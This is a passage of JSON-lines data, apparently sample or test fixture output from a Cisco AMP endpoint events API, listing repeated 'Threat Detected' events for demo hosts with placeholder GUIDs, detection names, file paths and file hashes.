Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251512150196260","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":584000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196259","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":443000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196258","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":396000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196257","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":381000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251512150196256","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":381000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196255","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":365000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196254","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":350000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196253","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":334000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196252","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":318000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196251","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":318000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196250","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":303000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196249","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":287000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196248","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":256000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196247","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":225000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196246","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":225000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196245","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":209000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196244","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":178000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196243","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":147000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196242","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":69000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196241","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":69000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196240","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176259080131183000,"timestamp":1610705857,"timestamp_nanoseconds":996000000,"date":"2021-01-15T10:17:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176259080131182683","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251507855229000,"timestamp":1610705857,"timestamp_nanoseconds":944000000,"date":"2021-01-15T10:17:37+00:00","event_type":"Threat 